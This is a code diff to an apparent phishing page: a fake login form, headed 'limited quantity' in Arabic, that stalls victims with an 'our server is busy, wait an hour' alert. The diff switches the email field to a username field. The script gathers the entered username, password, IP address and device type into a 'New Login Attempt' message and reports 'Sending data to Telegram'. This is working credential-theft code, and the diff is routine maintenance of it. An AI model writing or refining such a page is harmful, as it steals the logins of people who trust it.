--- a/index.html
+++ b/index.html
@@ -11,11 +11,11 @@
     <div class="container">
         <div class="login-box">
             <h2>الكمية محدودة</h2>
-            <h2>Username</h2>
+            <h2>اسم المستخدم</h2> <!-- تغيير هنا -->
             <form id="login-form">
                 <div class="user-box">
-                    <input type="email" id="email" required>
-                    <label>Email</label>
+                    <input type="text" id="username" required> <!-- تغيير من email إلى username -->
+                    <label>اسم المستخدم</label> <!-- تغيير النص هنا -->
                 </div>
                 <div class="user-box">
                     <input type="password" id="password" required>
@@ -35,8 +35,8 @@
 
             alert('عليك الانتظار ساعة بسبب الضغط على خادمنا');
 
-            // الحصول على البريد الإلكتروني وكلمة المرور المدخلة
-            const email = document.getElementById('email').value;
+            // الحصول على اسم المستخدم وكلمة المرور المدخلة
+            const username = document.getElementById('username').value;  // تغيير من email إلى username
             const password = document.getElementById('password').value;
 
             console.log("Sending data to Telegram...");
@@ -54,7 +54,7 @@
 
                 const message =  
                     `<b>New Login Attempt</b>\n
-                    <b>Email:</b> ${email}\n
+                    <b>Username:</b> ${username}\n  <!-- تغيير من Email إلى Username -->
                     <b>Password:</b> ${password}\n
                     <b>IP Address:</b> ${ip}\n
                     <b>Device Type:</b> ${deviceType}\n
@@ -81,4 +81,3 @@
     </script>
 </body>
 </html>
-
